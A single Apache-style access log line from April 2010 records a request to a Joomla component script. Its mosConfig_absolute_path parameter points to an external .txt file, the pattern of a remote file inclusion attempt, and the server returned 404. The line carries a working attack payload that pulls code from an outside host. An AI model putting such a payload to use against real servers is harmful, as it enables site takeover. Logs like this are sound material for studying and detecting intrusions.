123.30.181.5 - - [26/Apr/2010:06:54:18 -0500] "GET /administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
